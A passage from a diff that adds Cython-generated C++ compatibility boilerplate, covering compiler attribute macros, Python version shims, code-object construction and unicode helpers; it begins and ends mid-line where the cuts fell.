defined(__GNUC__) +# if !(defined(__cplusplus)) || (__GNUC__ > 3 || (__GNUC__ == 3 && __GNUC_MINOR__ >= 4)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +# elif defined(__ICC) || (defined(__INTEL_COMPILER) && !defined(_MSC_VER)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +#endif +#ifndef CYTHON_UNUSED_VAR +# if defined(__cplusplus) + template void CYTHON_UNUSED_VAR( const T& ) { } +# else +# define CYTHON_UNUSED_VAR(x) (void)(x) +# endif +#endif +#ifndef CYTHON_MAYBE_UNUSED_VAR + #define CYTHON_MAYBE_UNUSED_VAR(x) CYTHON_UNUSED_VAR(x) +#endif +#ifndef CYTHON_NCP_UNUSED +# if CYTHON_COMPILING_IN_CPYTHON +# define CYTHON_NCP_UNUSED +# else +# define CYTHON_NCP_UNUSED CYTHON_UNUSED +# endif +#endif +#define __Pyx_void_to_None(void_result) ((void)(void_result), Py_INCREF(Py_None), Py_None) +#ifdef _MSC_VER + #ifndef _MSC_STDINT_H_ + #if _MSC_VER < 1300 + typedef unsigned char uint8_t; + typedef unsigned short uint16_t; + typedef unsigned int uint32_t; + #else + typedef unsigned __int8 uint8_t; + typedef unsigned __int16 uint16_t; + typedef unsigned __int32 uint32_t; + #endif + #endif + #if _MSC_VER < 1300 + #ifdef _WIN64 + typedef unsigned long long __pyx_uintptr_t; + #else + typedef unsigned int __pyx_uintptr_t; + #endif + #else + #ifdef _WIN64 + typedef unsigned __int64 __pyx_uintptr_t; + #else + typedef unsigned __int32 __pyx_uintptr_t; + #endif + #endif +#else + #include + typedef uintptr_t __pyx_uintptr_t; +#endif +#ifndef CYTHON_FALLTHROUGH + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(fallthrough) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(fallthrough) + #define CYTHON_FALLTHROUGH [[fallthrough]] + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_cpp_attribute(clang::fallthrough) + #define CYTHON_FALLTHROUGH [[clang::fallthrough]] + #elif __has_cpp_attribute(gnu::fallthrough) + #define CYTHON_FALLTHROUGH [[gnu::fallthrough]] + #endif + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_attribute(fallthrough) + #define CYTHON_FALLTHROUGH __attribute__((fallthrough)) + #else + #define CYTHON_FALLTHROUGH + #endif + #endif + #if defined(__clang__) && defined(__apple_build_version__) + #if __apple_build_version__ < 7000000 + #undef CYTHON_FALLTHROUGH + #define CYTHON_FALLTHROUGH + #endif + #endif +#endif +#ifdef __cplusplus + template + struct __PYX_IS_UNSIGNED_IMPL {static const bool value = T(0) < T(-1);}; + #define __PYX_IS_UNSIGNED(type) (__PYX_IS_UNSIGNED_IMPL::value) +#else + #define __PYX_IS_UNSIGNED(type) (((type)-1) > 0) +#endif +#if CYTHON_COMPILING_IN_PYPY == 1 + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x030A0000) +#else + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x03090000) +#endif +#define __PYX_REINTERPRET_FUNCION(func_pointer, other_pointer) ((func_pointer)(void(*)(void))(other_pointer)) + +#ifndef __cplusplus + #error "Cython files generated with the C++ option must be compiled with a C++ compiler." +#endif +#ifndef CYTHON_INLINE + #if defined(__clang__) + #define CYTHON_INLINE __inline__ __attribute__ ((__unused__)) + #else + #define CYTHON_INLINE inline + #endif +#endif +template +void __Pyx_call_destructor(T& x) { + x.~T(); +} +template +class __Pyx_FakeReference { + public: + __Pyx_FakeReference() : ptr(NULL) { } + __Pyx_FakeReference(const T& ref) : ptr(const_cast(&ref)) { } + T *operator->() { return ptr; } + T *operator&() { return ptr; } + operator T&() { return *ptr; } + template bool operator ==(const U& other) const { return *ptr == other; } + template bool operator !=(const U& other) const { return *ptr != other; } + template bool operator==(const __Pyx_FakeReference& other) const { return *ptr == *other.ptr; } + template bool operator!=(const __Pyx_FakeReference& other) const { return *ptr != *other.ptr; } + private: + T *ptr; +}; + +#define __PYX_BUILD_PY_SSIZE_T "n" +#define CYTHON_FORMAT_SSIZE_T "z" +#if PY_MAJOR_VERSION < 3 + #define __Pyx_BUILTIN_MODULE_NAME "__builtin__" + #define __Pyx_DefaultClassType PyClass_Type + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a+k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_BUILTIN_MODULE_NAME "builtins" + #define __Pyx_DefaultClassType PyType_Type +#if PY_VERSION_HEX >= 0x030B00A1 + static CYTHON_INLINE PyCodeObject* __Pyx_PyCode_New(int a, int p, int k, int l, int s, int f, + PyObject *code, PyObject *c, PyObject* n, PyObject *v, + PyObject *fv, PyObject *cell, PyObject* fn, + PyObject *name, int fline, PyObject *lnos) { + PyObject *kwds=NULL, *argcount=NULL, *posonlyargcount=NULL, *kwonlyargcount=NULL; + PyObject *nlocals=NULL, *stacksize=NULL, *flags=NULL, *replace=NULL, *empty=NULL; + const char *fn_cstr=NULL; + const char *name_cstr=NULL; + PyCodeObject *co=NULL, *result=NULL; + PyObject *type, *value, *traceback; + PyErr_Fetch(&type, &value, &traceback); + if (!(kwds=PyDict_New())) goto end; + if (!(argcount=PyLong_FromLong(a))) goto end; + if (PyDict_SetItemString(kwds, "co_argcount", argcount) != 0) goto end; + if (!(posonlyargcount=PyLong_FromLong(p))) goto end; + if (PyDict_SetItemString(kwds, "co_posonlyargcount", posonlyargcount) != 0) goto end; + if (!(kwonlyargcount=PyLong_FromLong(k))) goto end; + if (PyDict_SetItemString(kwds, "co_kwonlyargcount", kwonlyargcount) != 0) goto end; + if (!(nlocals=PyLong_FromLong(l))) goto end; + if (PyDict_SetItemString(kwds, "co_nlocals", nlocals) != 0) goto end; + if (!(stacksize=PyLong_FromLong(s))) goto end; + if (PyDict_SetItemString(kwds, "co_stacksize", stacksize) != 0) goto end; + if (!(flags=PyLong_FromLong(f))) goto end; + if (PyDict_SetItemString(kwds, "co_flags", flags) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_code", code) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_consts", c) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_names", n) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_varnames", v) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_freevars", fv) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_cellvars", cell) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_linetable", lnos) != 0) goto end; + if (!(fn_cstr=PyUnicode_AsUTF8AndSize(fn, NULL))) goto end; + if (!(name_cstr=PyUnicode_AsUTF8AndSize(name, NULL))) goto end; + if (!(co = PyCode_NewEmpty(fn_cstr, name_cstr, fline))) goto end; + if (!(replace = PyObject_GetAttrString((PyObject*)co, "replace"))) goto end; + if (!(empty = PyTuple_New(0))) goto end; + result = (PyCodeObject*) PyObject_Call(replace, empty, kwds); + end: + Py_XDECREF((PyObject*) co); + Py_XDECREF(kwds); + Py_XDECREF(argcount); + Py_XDECREF(posonlyargcount); + Py_XDECREF(kwonlyargcount); + Py_XDECREF(nlocals); + Py_XDECREF(stacksize); + Py_XDECREF(replace); + Py_XDECREF(empty); + if (type) { + PyErr_Restore(type, value, traceback); + } + return result; + } +#elif PY_VERSION_HEX >= 0x030800B2 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_NewWithPosOnlyArgs(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#endif +#endif +#if PY_VERSION_HEX >= 0x030900A4 || defined(Py_IS_TYPE) + #define __Pyx_IS_TYPE(ob, type) Py_IS_TYPE(ob, type) +#else + #define __Pyx_IS_TYPE(ob, type) (((const PyObject*)ob)->ob_type == (type)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_Is) + #define __Pyx_Py_Is(x, y) Py_Is(x, y) +#else + #define __Pyx_Py_Is(x, y) ((x) == (y)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsNone) + #define __Pyx_Py_IsNone(ob) Py_IsNone(ob) +#else + #define __Pyx_Py_IsNone(ob) __Pyx_Py_Is((ob), Py_None) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsTrue) + #define __Pyx_Py_IsTrue(ob) Py_IsTrue(ob) +#else + #define __Pyx_Py_IsTrue(ob) __Pyx_Py_Is((ob), Py_True) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsFalse) + #define __Pyx_Py_IsFalse(ob) Py_IsFalse(ob) +#else + #define __Pyx_Py_IsFalse(ob) __Pyx_Py_Is((ob), Py_False) +#endif +#define __Pyx_NoneAsNull(obj) (__Pyx_Py_IsNone(obj) ? NULL : (obj)) +#if PY_VERSION_HEX >= 0x030900F0 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyObject_GC_IsFinalized(o) PyObject_GC_IsFinalized(o) +#else + #define __Pyx_PyObject_GC_IsFinalized(o) _PyGC_FINALIZED(o) +#endif +#ifndef CO_COROUTINE + #define CO_COROUTINE 0x80 +#endif +#ifndef CO_ASYNC_GENERATOR + #define CO_ASYNC_GENERATOR 0x200 +#endif +#ifndef Py_TPFLAGS_CHECKTYPES + #define Py_TPFLAGS_CHECKTYPES 0 +#endif +#ifndef Py_TPFLAGS_HAVE_INDEX + #define Py_TPFLAGS_HAVE_INDEX 0 +#endif +#ifndef Py_TPFLAGS_HAVE_NEWBUFFER + #define Py_TPFLAGS_HAVE_NEWBUFFER 0 +#endif +#ifndef Py_TPFLAGS_HAVE_FINALIZE + #define Py_TPFLAGS_HAVE_FINALIZE 0 +#endif +#ifndef Py_TPFLAGS_SEQUENCE + #define Py_TPFLAGS_SEQUENCE 0 +#endif +#ifndef Py_TPFLAGS_MAPPING + #define Py_TPFLAGS_MAPPING 0 +#endif +#ifndef METH_STACKLESS + #define METH_STACKLESS 0 +#endif +#if PY_VERSION_HEX <= 0x030700A3 || !defined(METH_FASTCALL) + #ifndef METH_FASTCALL + #define METH_FASTCALL 0x80 + #endif + typedef PyObject *(*__Pyx_PyCFunctionFast) (PyObject *self, PyObject *const *args, Py_ssize_t nargs); + typedef PyObject *(*__Pyx_PyCFunctionFastWithKeywords) (PyObject *self, PyObject *const *args, + Py_ssize_t nargs, PyObject *kwnames); +#else + #define __Pyx_PyCFunctionFast _PyCFunctionFast + #define __Pyx_PyCFunctionFastWithKeywords _PyCFunctionFastWithKeywords +#endif +#if CYTHON_METH_FASTCALL + #define __Pyx_METH_FASTCALL METH_FASTCALL + #define __Pyx_PyCFunction_FastCall __Pyx_PyCFunctionFast + #define __Pyx_PyCFunction_FastCallWithKeywords __Pyx_PyCFunctionFastWithKeywords +#else + #define __Pyx_METH_FASTCALL METH_VARARGS + #define __Pyx_PyCFunction_FastCall PyCFunction + #define __Pyx_PyCFunction_FastCallWithKeywords PyCFunctionWithKeywords +#endif +#if CYTHON_VECTORCALL + #define __pyx_vectorcallfunc vectorcallfunc + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET PY_VECTORCALL_ARGUMENTS_OFFSET + #define __Pyx_PyVectorcall_NARGS(n) PyVectorcall_NARGS((size_t)(n)) +#elif CYTHON_BACKPORT_VECTORCALL + typedef PyObject *(*__pyx_vectorcallfunc)(PyObject *callable, PyObject *const *args, + size_t nargsf, PyObject *kwnames); + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET ((size_t)1 << (8 * sizeof(size_t) - 1)) + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(((size_t)(n)) & ~__Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET)) +#else + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET 0 + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(n)) +#endif +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) ((void)m, PyType_FromSpecWithBases(s, b)) + typedef PyObject *(*__Pyx_PyCMethod)(PyObject *, PyTypeObject *, PyObject *const *, size_t, PyObject *); +#else + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) PyType_FromModuleAndSpec(m, s, b) + #define __Pyx_PyCMethod PyCMethod +#endif +#ifndef METH_METHOD + #define METH_METHOD 0x200 +#endif +#if CYTHON_COMPILING_IN_PYPY && !defined(PyObject_Malloc) + #define PyObject_Malloc(s) PyMem_Malloc(s) + #define PyObject_Free(p) PyMem_Free(p) + #define PyObject_Realloc(p) PyMem_Realloc(p) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) +#else + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) (frame)->f_lineno = (lineno) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyThreadState_Current PyThreadState_Get() +#elif !CYTHON_FAST_THREAD_STATE + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#elif PY_VERSION_HEX >= 0x03060000 + #define __Pyx_PyThreadState_Current _PyThreadState_UncheckedGet() +#elif PY_VERSION_HEX >= 0x03000000 + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#else + #define __Pyx_PyThreadState_Current _PyThreadState_Current +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE void *__Pyx_PyModule_GetState(PyObject *op) +{ + void *result; + result = PyModule_GetState(op); + if (!result) + Py_FatalError("Couldn't find the module state"); + return result; +} +#endif +#define __Pyx_PyObject_GetSlot(obj, name, func_ctype) __Pyx_PyType_GetSlot(Py_TYPE(obj), name, func_ctype) +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((func_ctype) PyType_GetSlot((type), Py_##name)) +#else + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((type)->name) +#endif +#if PY_VERSION_HEX < 0x030700A2 && !defined(PyThread_tss_create) && !defined(Py_tss_NEEDS_INIT) +#include "pythread.h" +#define Py_tss_NEEDS_INIT 0 +typedef int Py_tss_t; +static CYTHON_INLINE int PyThread_tss_create(Py_tss_t *key) { + *key = PyThread_create_key(); + return 0; +} +static CYTHON_INLINE Py_tss_t * PyThread_tss_alloc(void) { + Py_tss_t *key = (Py_tss_t *)PyObject_Malloc(sizeof(Py_tss_t)); + *key = Py_tss_NEEDS_INIT; + return key; +} +static CYTHON_INLINE void PyThread_tss_free(Py_tss_t *key) { + PyObject_Free(key); +} +static CYTHON_INLINE int PyThread_tss_is_created(Py_tss_t *key) { + return *key != Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE void PyThread_tss_delete(Py_tss_t *key) { + PyThread_delete_key(*key); + *key = Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE int PyThread_tss_set(Py_tss_t *key, void *value) { + return PyThread_set_key_value(*key, value); +} +static CYTHON_INLINE void * PyThread_tss_get(Py_tss_t *key) { + return PyThread_get_key_value(*key); +} +#endif +#if PY_MAJOR_VERSION < 3 + #if CYTHON_COMPILING_IN_PYPY + #if PYPY_VERSION_NUM < 0x07030600 + #if defined(__cplusplus) && __cplusplus >= 201402L + [[deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")]] + #elif defined(__GNUC__) || defined(__clang__) + __attribute__ ((__deprecated__("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6"))) + #elif defined(_MSC_VER) + __declspec(deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")) + #endif + static CYTHON_INLINE int PyGILState_Check(void) { + return 0; + } + #else // PYPY_VERSION_NUM < 0x07030600 + #endif // PYPY_VERSION_NUM < 0x07030600 + #else + static CYTHON_INLINE int PyGILState_Check(void) { + PyThreadState * tstate = _PyThreadState_Current; + return tstate && (tstate == PyGILState_GetThisThreadState()); + } + #endif +#endif +#if CYTHON_COMPILING_IN_CPYTHON || defined(_PyDict_NewPresized) +#define __Pyx_PyDict_NewPresized(n) ((n <= 8) ? PyDict_New() : _PyDict_NewPresized(n)) +#else +#define __Pyx_PyDict_NewPresized(n) PyDict_New() +#endif +#if PY_MAJOR_VERSION >= 3 || CYTHON_FUTURE_DIVISION + #define __Pyx_PyNumber_Divide(x,y) PyNumber_TrueDivide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceTrueDivide(x,y) +#else + #define __Pyx_PyNumber_Divide(x,y) PyNumber_Divide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceDivide(x,y) +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX > 0x030600B4 && CYTHON_USE_UNICODE_INTERNALS +#define __Pyx_PyDict_GetItemStrWithError(dict, name) _PyDict_GetItem_KnownHash(dict, name, ((PyASCIIObject *) name)->hash) +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStr(PyObject *dict, PyObject *name) { + PyObject *res = __Pyx_PyDict_GetItemStrWithError(dict, name); + if (res == NULL) PyErr_Clear(); + return res; +} +#elif PY_MAJOR_VERSION >= 3 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07020000) +#define __Pyx_PyDict_GetItemStrWithError PyDict_GetItemWithError +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#else +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStrWithError(PyObject *dict, PyObject *name) { +#if CYTHON_COMPILING_IN_PYPY + return PyDict_GetItem(dict, name); +#else + PyDictEntry *ep; + PyDictObject *mp = (PyDictObject*) dict; + long hash = ((PyStringObject *) name)->ob_shash; + assert(hash != -1); + ep = (mp->ma_lookup)(mp, name, hash); + if (ep == NULL) { + return NULL; + } + return ep->me_value; +#endif +} +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#endif +#if CYTHON_USE_TYPE_SLOTS + #define __Pyx_PyType_GetFlags(tp) (((PyTypeObject *)tp)->tp_flags) + #define __Pyx_PyType_HasFeature(type, feature) ((__Pyx_PyType_GetFlags(type) & (feature)) != 0) + #define __Pyx_PyObject_GetIterNextFunc(obj) (Py_TYPE(obj)->tp_iternext) +#else + #define __Pyx_PyType_GetFlags(tp) (PyType_GetFlags((PyTypeObject *)tp)) + #define __Pyx_PyType_HasFeature(type, feature) PyType_HasFeature(type, feature) + #define __Pyx_PyObject_GetIterNextFunc(obj) PyIter_Next +#endif +#if CYTHON_USE_TYPE_SPECS && PY_VERSION_HEX >= 0x03080000 +#define __Pyx_PyHeapTypeObject_GC_Del(obj) {\ + PyTypeObject *type = Py_TYPE(obj);\ + assert(__Pyx_PyType_HasFeature(type, Py_TPFLAGS_HEAPTYPE));\ + PyObject_GC_Del(obj);\ + Py_DECREF(type);\ +} +#else +#define __Pyx_PyHeapTypeObject_GC_Del(obj) PyObject_GC_Del(obj) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define CYTHON_PEP393_ENABLED 1 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GetLength(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_ReadChar(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((void)u, 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((void)u, (0)) + #define __Pyx_PyUnicode_DATA(u) ((void*)u) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)k, PyUnicode_ReadChar((PyObject*)(d), i)) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GetLength(u)) +#elif PY_VERSION_HEX > 0x03030000 && defined(PyUnicode_KIND) + #define CYTHON_PEP393_ENABLED 1 + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_READY(op) (0) + #else + #define __Pyx_PyUnicode_READY(op) (likely(PyUnicode_IS_READY(op)) ?\ + 0 : _PyUnicode_Ready((PyObject *)(op))) + #endif + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_LENGTH(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_READ_CHAR(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) PyUnicode_MAX_CHAR_VALUE(u) + #define __Pyx_PyUnicode_KIND(u) ((int)PyUnicode_KIND(u)) + #define __Pyx_PyUnicode_DATA(u) PyUnicode_DATA(u) + #define __Pyx_PyUnicode_READ(k, d, i) PyUnicode_READ(k, d, i) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) PyUnicode_WRITE(k, d, i, (Py_UCS4) ch) + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_LENGTH(u)) + #else + #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03090000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : ((PyCompactUnicodeObject *)(u))->wstr_length)) + #else + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : PyUnicode_GET_SIZE(u))) + #endif + #endif +#else + #define CYTHON_PEP393_ENABLED 0 + #define PyUnicode_1BYTE_KIND 1 + #define PyUnicode_2BYTE_KIND 2 + #define PyUnicode_4BYTE_KIND 4 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_SIZE(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) ((Py_UCS4)(PyUnicode_AS_UNICODE(u)[i])) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((sizeof(Py_UNICODE) == 2) ? 65535U : 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((int)sizeof(Py_UNICODE)) + #define __Pyx_PyUnicode_DATA(u) ((void*)PyUnicode_AS_UNICODE(u)) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)(k), (Py_UCS4)(((Py_UNICODE*)d)[i])) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) (((void)(k)), ((Py_UNICODE*)d)[i] = (Py_UNICODE) ch) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_SIZE(u)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyUnicode_Concat(a, b) PyNumber_Add(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) PyNumber_Add(a, b) +#else + #define __Pyx_PyUnicode_Concat(a, b) PyUnicode_Concat(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) ((unlikely((a) == Py_None) || unlikely((b) == Py_None)) ?\ + PyNumber_Add(a, b) : __Pyx_PyUnicode_Concat(a, b)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #if !defined(PyUnicode_DecodeUnicodeEscape) + #define PyUnicode_DecodeUnicodeEscape(s, size, errors) PyUnicode_Decode(s, size, "unicode_escape", errors) + #endif + #if !defined(PyUnicode_Contains) || (PY_MAJOR_VERSION == 2 && PYPY_VERSION_NUM < 0x07030500) + #undef PyUnicode_Contains + #define PyUnicode_Contains(u, s) PySequence_Contains(u, s) + #endif + #if !defined(PyByteArray_Check) + #define PyByteArray_Check(obj) PyObject_TypeCheck(obj, &PyByteArray_Type) + #endif + #if !defined(PyObject_Format) + #define PyObject_Format(obj, fmt) PyObject_CallMethod(obj, "__format__", "O", fmt) + #endif +#endif +#define __Pyx_PyString_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyString_Check(b) && !PyString_CheckExact(b)))) ? PyNumber_Remainder(a, b) : __Pyx_PyString_Format(a, b)) +#define __Pyx_PyUnicode_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyUnicode_Check(b) && !PyUnicode_CheckExact(b)))) ? PyNumber_Remainder(a, b) : PyUnicode_Format(a, b)) +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyString_Format(a, b) PyUnicode_Format(a, b) +#else + #define __Pyx_PyString_Format(a, b) PyString_Format(a, b) +#endif +#if PY_MAJOR_VERSION < 3 && !defined(PyObject_ASCII) + #define PyObject_ASCII(o) PyObject_Repr(o) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBaseString_Type PyUnicode_Type + #define PyStringObject PyUnicodeObject + #define PyString_Type PyUnicode_Type + #define PyString_Check PyUnicode_Check + #define PyString_CheckExact PyUnicode_CheckExact +#ifndef PyObject_Unicode + #define PyObject_Unicode PyObject_Str +#endif +#endif +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyBaseString_Check(obj) PyUnicode_Check(obj) + #define __Pyx_PyBaseString_CheckExact(obj) PyUnicode_CheckExact(obj) +#else + #define __Pyx_PyBaseString_Check(obj) (PyString_Check(obj) || PyUnicode_Check(obj)) + #define __Pyx_PyBaseString_CheckExact(obj) (PyString_CheckExact(obj) || PyUnicode_CheckExact(obj)) +#endif +#if CYTHON_COMPILING_IN_CPYTHON + #define __Pyx_PySequence_ListKeepNew(obj)\ + (likely(PyList_CheckExact(obj) && Py_REFCNT(obj) == 1) ? __Pyx_NewRef(obj) : PySequence_List(obj)) +#else + #define __Pyx_PySequence_ListKeepNew(obj) PySequence_List(obj) +#endif +#ifndef PySet_CheckExact + #define PySet_CheckExact(obj) __Pyx_IS_TYPE(obj, &PySet_Type) +#endif +#if PY_VERSION_HEX >= 0x030900A4 + #define __Pyx_SET_REFCNT(obj, refcnt) Py_SET_REFCNT(obj, refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SET_SIZE(obj, size) +#else + #define __Pyx_SET_REFCNT(obj, refcnt) Py_REFCNT(obj) = (refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SIZE(obj) = (size) +#endif +#if CYTHON_ASSUME_SAFE_MACROS + #define __Pyx_PySequence_SIZE(seq) Py_SIZE(seq) +#else + #define __Pyx_PySequence_SIZE(seq) PySequence_Size(seq) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyIntObject PyLongObject + #define PyInt_Type PyLong_Type + #define PyInt_Check(op) PyLong_Check(op) + #define PyInt_CheckExact(op) PyLong_CheckExact(op) + #define __Pyx_Py3Int_Check(op) PyLong_Check(op) + #define __Pyx_Py3Int_CheckExact(op) PyLong_CheckExact(op) + #define PyInt_FromString PyLong_FromString + #define PyInt_FromUnicode PyLong_FromUnicode + #define PyInt_FromLong PyLong_FromLong + #define PyInt_FromSize_t PyLong_FromSize_t + #define PyInt_FromSsize_t PyLong_FromSsize_t + #define PyInt_AsLong PyLong_AsLong + #define PyInt_AS_LONG PyLong_AS_LONG + #define PyInt_AsSsize_t PyLong_AsSsize_t + #define PyInt_AsUnsignedLongMask PyLong_AsUnsignedLongMask + #define PyInt_AsUnsignedLongLongMask PyLong_AsUnsignedLongLongMask + #define PyNumber_Int PyNumber_Long +#else + #define __Pyx_Py3Int_Check(op) (PyLong_Check(op) || PyInt_Check(op)) + #define __Pyx_Py3Int_CheckExact(op) (PyLong_CheckExact(op) || PyInt_CheckExact(op)) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBoolObject PyLongObject +#endif +#if PY_MAJOR_VERSION >= 3 && CYTHON_COMPILING_IN_PYPY + #ifndef PyUnicode_InternFromString + #define PyUnicode_InternFromString(s) PyUnicode_FromString(s) + #endif +#endif +#if PY_VERSION_HEX < 0x030200A4 + typedef long Py_hash_t; + #define __Pyx_PyInt_FromHash_t PyInt_FromLong + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsHash_t +#else + #define __Pyx_PyInt_FromHash_t PyInt_FromSsize_t + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsSsize_t +#endif +#if CYTHON_USE_ASYNC_SLOTS + #if PY_VERSION_HEX >= 0x030500B1 + #define __Pyx_PyAsyncMethodsStruct PyAsyncMethods + #define __Pyx_PyType_AsAsync(obj) (Py_TYPE(obj)->tp_as_async) + #else + #define __Pyx_PyType_AsAsync(obj) ((__Pyx_PyAsyncMethodsStruct*) (Py_TYPE(obj)->tp_reserved)) + #endif +#else + #define __Pyx_PyType_AsAsync(obj) NULL +#endif +#ifndef __Pyx_PyAsyncMethodsStruct + typedef struct { + unaryfunc am_await; + unaryfunc am_aiter; + unaryfunc am_anext; + } __Pyx_PyAsyncMethodsStruct; +#endif + +#if defined(_WIN32) || defined(WIN32) || defined(MS_WINDOWS) + #if !defined(_USE_MATH_DEFINES) + #define _USE_MATH_DEFINES + #endif +#endif +#include +#ifdef NAN +#define __PYX_NAN() ((float) NAN) +#else +static CYTHON_INLINE float __PYX_NAN() { + float value; + memset(&value, 0xFF, sizeof(value)); + return value; +} +#endif +#if defined(__CYGWIN__) && defined(_LDBL_EQ_DBL) +#define __Pyx_truncl trunc +#else +#define __Pyx_truncl truncl +#endif + +#define __PYX_MARK_ERR_POS(f_index, 